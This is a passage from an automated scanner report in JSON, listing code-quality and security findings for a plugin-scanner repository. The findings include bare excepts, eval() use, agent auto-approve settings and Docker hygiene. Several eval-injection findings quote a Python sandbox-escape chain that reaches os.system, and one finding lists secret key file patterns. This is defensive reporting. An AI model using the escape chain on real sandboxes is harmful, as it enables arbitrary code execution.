AI agents reach for this pattern when a flaky test or an unfamiliar API throws \u2014 wrap, swallow, return success. Real bugs are masked, observability is destroyed, and callers think the operation worked. CWE-396 (improperly-generalized exception). Distinct from intentional fallback because there's no log line and the success value is fabricated."}, "properties": {"repobilityId": 145015, "scanner": "repobility-threat-engine", "fingerprint": "a8e3245aa57b72109a3cf59b885ef5726e5418aacfa70282eacfbe11f6fe5347", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "try:\n            resp = requests.get(f\"{guard_url}/v1/requests\", timeout=10)\n            if resp.sta", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC136", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|a8e3245aa57b72109a3cf59b885ef5726e5418aacfa70282eacfbe11f6fe5347"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/bridge/__init__.py"}, "region": {"startLine": 200}}}]}, {"ruleId": "COMP001", "level": "warning", "message": {"text": "[COMP001] High cognitive complexity: Function `check_skill_frontmatter` has cognitive complexity 17 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. 
Breakdown: continue=3, except=1, for=1, if=8, nested_bonus=4."}, "properties": {"repobilityId": 144994, "scanner": "repobility-threat-engine", "fingerprint": "66821cb4bc1b19ce644d8e7deeb4ad33bb796459b20f5fc7d578e6febb78e8d9", "category": "quality", "severity": "medium", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 17 (severity threshold for medium: 15+).", "evidence": {"scanner": "repobility-threat-engine", "function": "check_skill_frontmatter", "breakdown": {"if": 8, "for": 1, "except": 1, "continue": 3, "nested_bonus": 4}, "complexity": 17, "correlation_key": "fp|66821cb4bc1b19ce644d8e7deeb4ad33bb796459b20f5fc7d578e6febb78e8d9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/best_practices.py"}, "region": {"startLine": 87}}}]}, {"ruleId": "SEC045", "level": "warning", "message": {"text": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ cleared) are escapable: attackers use object introspection (().__class__.__mro__[-1].__subclasses__()) to reach os.system. 
CWE-95 (eval injection)."}, "properties": {"repobilityId": 144982, "scanner": "repobility-threat-engine", "fingerprint": "844e3e4c4ca0619edb1c65f4c69923b7c0fd7e6a241bd6e3313beaaca55d0af2", "category": "injection", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "eval(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC045", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|44|sec045"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/code_quality.py"}, "region": {"startLine": 44}}}]}, {"ruleId": "SEC045", "level": "warning", "message": {"text": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ cleared) are escapable: attackers use object introspection (().__class__.__mro__[-1].__subclasses__()) to reach os.system. 
CWE-95 (eval injection)."}, "properties": {"repobilityId": 144981, "scanner": "repobility-threat-engine", "fingerprint": "77f8f1802d11e3d0a53a678328984a619ba95d6c4b37a4b0c03ae79a099d8d86", "category": "injection", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".exec(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC045", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|114|sec045"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/risk-signal-cards.tsx"}, "region": {"startLine": 114}}}]}, {"ruleId": "SEC045", "level": "warning", "message": {"text": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ cleared) are escapable: attackers use object introspection (().__class__.__mro__[-1].__subclasses__()) to reach os.system. 
CWE-95 (eval injection)."}, "properties": {"repobilityId": 144980, "scanner": "repobility-threat-engine", "fingerprint": "9a9116f017477d9cb97caf115190a25bc9dd30b0f466fec26159487508c7b5d0", "category": "injection", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "\"eval(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC045", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|78|sec045"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/apps/app-catalog.ts"}, "region": {"startLine": 78}}}]}, {"ruleId": "AGT013", "level": "warning", "message": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "properties": {"repobilityId": 144979, "scanner": "repobility-agent-runtime", "fingerprint": "d9b649bc3942aac1304b7bc02fe37073dbfaaec39391198cfd7cde4d489b5ee9", "category": "quality", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File exposes or configures a broad agent auto-approval mode without enough local guard wording.", "evidence": {"rule_id": "AGT013", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|d9b649bc3942aac1304b7bc02fe37073dbfaaec39391198cfd7cde4d489b5ee9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/codex-auto-resume-smoke.py"}, "region": {"startLine": 122}}}]}, {"ruleId": "AGT007", "level": "warning", "message": {"text": "localStorage write failures are swallowed silently"}, "properties": {"repobilityId": 144978, "scanner": "repobility-agent-runtime", "fingerprint": "01e4669e7d1d47cada08855faadc3517f741cb45343a4d05074d8b41ff1e29ba", "category": "quality", "severity": "medium", "confidence": 0.8, "triageState": "open", "verdict": "likely", "isResolved": 
false, "reason": "File writes to localStorage and has an empty or ignore-only catch block without QuotaExceededError handling.", "evidence": {"rule_id": "AGT007", "scanner": "repobility-agent-runtime", "references": ["https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API"], "correlation_key": "fp|01e4669e7d1d47cada08855faadc3517f741cb45343a4d05074d8b41ff1e29ba"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/approval-center-layout.tsx"}, "region": {"startLine": 213}}}]}, {"ruleId": "DEPCUR-NPM", "level": "warning", "message": {"text": "npm package `@vitejs/plugin-react` is 1 major version(s) behind (^5.0.4 -> 6.0.2)"}, "properties": {"repobilityId": 144976, "scanner": "repobility-dependency-currency", "fingerprint": "a6493e6a91998f651bb22faaa35aeaab3af4ad1c896cb3654f82459ed7ff3e2e", "category": "dependency", "severity": "medium", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"gap": "1 major version(s) behind", "signal": "currency", "cwe_ids": [], "package": "@vitejs/plugin-react", "scanner": "repobility-dependency-currency", "ecosystem": "npm", "languages": ["javascript"], "latest_version": "6.0.2", "correlation_key": "fp|a6493e6a91998f651bb22faaa35aeaab3af4ad1c896cb3654f82459ed7ff3e2e", "current_version": "^5.0.4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/package.json"}, "region": {"startLine": 1}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144961, "scanner": "repobility-ast-engine", "fingerprint": "db3a1363b10b92d9e857c8a0640bdb912339948f307e8b768f7a7f6fea2f1352", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], 
"observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|db3a1363b10b92d9e857c8a0640bdb912339948f307e8b768f7a7f6fea2f1352"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/approvals.py"}, "region": {"startLine": 266}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144960, "scanner": "repobility-ast-engine", "fingerprint": "cded45bf1b045a960574340b9628a13b6620192d5a6fce1bcbd0ea32ada8a6aa", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|cded45bf1b045a960574340b9628a13b6620192d5a6fce1bcbd0ea32ada8a6aa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/provenance.py"}, "region": {"startLine": 138}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144959, "scanner": "repobility-ast-engine", "fingerprint": "4ea09663072b29517faea96997bb8f78aa4881c3e1ae638c17d52a8d23647529", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4ea09663072b29517faea96997bb8f78aa4881c3e1ae638c17d52a8d23647529"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/provenance.py"}, "region": {"startLine": 90}}}]}, {"ruleId": "MINED111", "level": 
"warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144958, "scanner": "repobility-ast-engine", "fingerprint": "9bb5600c46779e341be2ca28178498c7e9b35bfd5cba2a3016385fe18f5cfaef", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9bb5600c46779e341be2ca28178498c7e9b35bfd5cba2a3016385fe18f5cfaef"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/desktop_notifications.py"}, "region": {"startLine": 124}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144957, "scanner": "repobility-ast-engine", "fingerprint": "389c5c0495e78e4cdd583b4abafed4dc04ee394920a59b8fe5710d4050644ce3", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|389c5c0495e78e4cdd583b4abafed4dc04ee394920a59b8fe5710d4050644ce3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/desktop_notifications.py"}, "region": {"startLine": 290}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144956, "scanner": "repobility-ast-engine", "fingerprint": "0509a8001eeb642bc6ab08195ca014c0ca1d1a561e4803569c52a20216031819", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": 
"", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0509a8001eeb642bc6ab08195ca014c0ca1d1a561e4803569c52a20216031819"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/desktop_notifications.py"}, "region": {"startLine": 202}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144955, "scanner": "repobility-ast-engine", "fingerprint": "1623e22b8dd3cafc3bc798a2c96f3982e841675a1a0167058374062ac097891a", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1623e22b8dd3cafc3bc798a2c96f3982e841675a1a0167058374062ac097891a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/desktop_notifications.py"}, "region": {"startLine": 140}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144954, "scanner": "repobility-ast-engine", "fingerprint": "321281b02b28898a35e14eef0d89e39adc134a224d2723700833f0eee43ff1da", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": 
"fp|321281b02b28898a35e14eef0d89e39adc134a224d2723700833f0eee43ff1da"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/access_graph_events.py"}, "region": {"startLine": 83}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144953, "scanner": "repobility-ast-engine", "fingerprint": "88bbfd36887c064ad03edd0f7cfb1deb800746f9ca5db195e69ffd5d4d498566", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|88bbfd36887c064ad03edd0f7cfb1deb800746f9ca5db195e69ffd5d4d498566"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 820}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144952, "scanner": "repobility-ast-engine", "fingerprint": "63c1ed14e3b6fbae3c6f25998755a1ea73a1f5e6be75345a484a104b01ade0e6", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|63c1ed14e3b6fbae3c6f25998755a1ea73a1f5e6be75345a484a104b01ade0e6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 683}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": 
{"repobilityId": 144951, "scanner": "repobility-ast-engine", "fingerprint": "ad4701f95e6e59af310ba9b28e17815312c9a0f42d44334b0f8fc9418804db5a", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ad4701f95e6e59af310ba9b28e17815312c9a0f42d44334b0f8fc9418804db5a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 677}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144950, "scanner": "repobility-ast-engine", "fingerprint": "481b4e2aa0cddbbe6b3392ef2dbe4d98edc3ee7c9fea8abde6902ceea7f86cf7", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|481b4e2aa0cddbbe6b3392ef2dbe4d98edc3ee7c9fea8abde6902ceea7f86cf7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 671}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144949, "scanner": "repobility-ast-engine", "fingerprint": "30ceed5222634b9a203f5bd6caa524fd24fb1b8c483cd15fdf0ddd9d7e72c7c7", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": 
"bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|30ceed5222634b9a203f5bd6caa524fd24fb1b8c483cd15fdf0ddd9d7e72c7c7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 665}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144948, "scanner": "repobility-ast-engine", "fingerprint": "6734eb085d410cebd7da9c9cd5f2bdad7fe8feac964bb0c6bbb7fd31720309b1", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|6734eb085d410cebd7da9c9cd5f2bdad7fe8feac964bb0c6bbb7fd31720309b1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 659}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144947, "scanner": "repobility-ast-engine", "fingerprint": "b7c943273a5cad3067d557520d375118abb0a1f9846bf2b66a29eb24b1ee70d5", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b7c943273a5cad3067d557520d375118abb0a1f9846bf2b66a29eb24b1ee70d5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, 
"region": {"startLine": 498}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144946, "scanner": "repobility-ast-engine", "fingerprint": "b7040b7e2ad0995a34526b35172f879c8380f3e7a38e80bb28c3f11c88edc78b", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b7040b7e2ad0995a34526b35172f879c8380f3e7a38e80bb28c3f11c88edc78b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 487}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144945, "scanner": "repobility-ast-engine", "fingerprint": "75967b67e06fce1cfea6a2d6e0bfa54681561e69625151943821af24b0830863", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|75967b67e06fce1cfea6a2d6e0bfa54681561e69625151943821af24b0830863"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 444}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144944, "scanner": "repobility-ast-engine", "fingerprint": "49e7a830a0acf28387257beebe413fc7d6f7ccff2e4c140345b51296cf8e866d", "category": "quality", "severity": "medium", "confidence": 1.0, 
"triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|49e7a830a0acf28387257beebe413fc7d6f7ccff2e4c140345b51296cf8e866d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 378}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144942, "scanner": "repobility-ast-engine", "fingerprint": "4e49947f2e30658fab4c4b52a0a58bfb0fa14557156c69dd13f328407077524f", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4e49947f2e30658fab4c4b52a0a58bfb0fa14557156c69dd13f328407077524f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/cli.py"}, "region": {"startLine": 526}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144941, "scanner": "repobility-ast-engine", "fingerprint": "4dda6a54a01060e7c9994601f2c82f4f25a8b9c73f1c82a5e56ed088956fdd04", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4dda6a54a01060e7c9994601f2c82f4f25a8b9c73f1c82a5e56ed088956fdd04"}}, 
"locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/verification.py"}, "region": {"startLine": 432}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144917, "scanner": "repobility-ast-engine", "fingerprint": "e4c939e3fb06a6e5d672a34766450f99a85cfa5a734691c0287d1b02e1d6c671", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e4c939e3fb06a6e5d672a34766450f99a85cfa5a734691c0287d1b02e1d6c671"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_daemon_manager.py"}, "region": {"startLine": 834}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144916, "scanner": "repobility-ast-engine", "fingerprint": "22ff05a817de90a86498d6df40a413fb1adb47ab828ca58537369bd2fa7d1f1f", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|22ff05a817de90a86498d6df40a413fb1adb47ab828ca58537369bd2fa7d1f1f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_daemon_manager.py"}, "region": {"startLine": 827}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144915, "scanner": "repobility-ast-engine", "fingerprint": 
"2eecb3b426b3ecfab545400882d292f2baba9ea3a9cf83f213194f148b5dddea", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|2eecb3b426b3ecfab545400882d292f2baba9ea3a9cf83f213194f148b5dddea"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_daemon_manager.py"}, "region": {"startLine": 328}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144909, "scanner": "repobility-ast-engine", "fingerprint": "8fbbe839dda266cf4f07c7cbbea29268d29dc05ce07b9e5a0c711988525c58a4", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|8fbbe839dda266cf4f07c7cbbea29268d29dc05ce07b9e5a0c711988525c58a4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime.py"}, "region": {"startLine": 17799}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144908, "scanner": "repobility-ast-engine", "fingerprint": "b0719666b2b14d3fc820ef0a9106976e4dbb591b675f007b2e28d22c51e53c4d", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, 
"scanner": "repobility-ast-engine", "correlation_key": "fp|b0719666b2b14d3fc820ef0a9106976e4dbb591b675f007b2e28d22c51e53c4d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime.py"}, "region": {"startLine": 17489}}}]}, {"ruleId": "CORE_LARGE_FILES", "level": "warning", "message": {"text": "Average file size is 503 lines (recommend <300)"}, "properties": {"repobilityId": 144851, "scanner": "repobility-core", "fingerprint": "b0e66619f97f587fa8444689621ec3c041c9750925ebc075b108749df93bb6c5", "category": "quality", "severity": "medium", "confidence": null, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"rule_id": "CORE_LARGE_FILES", "scanner": "repobility-core", "correlation_key": "fp|b0e66619f97f587fa8444689621ec3c041c9750925ebc075b108749df93bb6c5"}}}, {"ruleId": "DKR012", "level": "note", "message": {"text": "Dockerfile keeps pip download cache"}, "properties": {"repobilityId": 145033, "scanner": "repobility-docker", "fingerprint": "e79e860d9e7f73acaa261b3e478f507b1eb669204892be48b194b33f1d21f494", "category": "docker", "severity": "low", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "pip install appears without --no-cache-dir.", "evidence": {"rule_id": "DKR012", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/"], "correlation_key": "fp|e79e860d9e7f73acaa261b3e478f507b1eb669204892be48b194b33f1d21f494"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile"}, "region": {"startLine": 11}}}]}, {"ruleId": "DKR008", "level": "note", "message": {"text": ".dockerignore misses sensitive defaults"}, "properties": {"repobilityId": 145032, "scanner": "repobility-docker", "fingerprint": "aea2ad92c68c4ee1f8432bb1ec25e7d45ac12c9e1790ac2d3fffe638b1acce12", "category": "docker", "severity": "low", "confidence": 0.72, "triageState": "open", "verdict": "likely", 
"isResolved": false, "reason": "A Docker build context should exclude secrets and repository metadata.", "evidence": {"rule_id": "DKR008", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/"], "correlation_key": "fp|aea2ad92c68c4ee1f8432bb1ec25e7d45ac12c9e1790ac2d3fffe638b1acce12", "missing_patterns": [".env", "id_rsa", "*.pem", "*.key"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".dockerignore"}, "region": {"startLine": 1}}}]}, {"ruleId": "SEC004", "level": "note", "message": {"text": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection."}, "properties": {"repobilityId": 145021, "scanner": "repobility-threat-engine", "fingerprint": "db9edaa7f720046c0e4f8cd553b56891b25e75bf54ff0df07f6d1c356bf06a87", "category": "injection", "severity": "low", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Placeholder variable defined nearby \u2014 likely parameterized query", "evidence": {"match": ".execute(\n        f\"delete", "reason": "Placeholder variable defined nearby \u2014 likely parameterized query", "rule_id": "SEC004", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "code|injection|token|159|sec004"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": 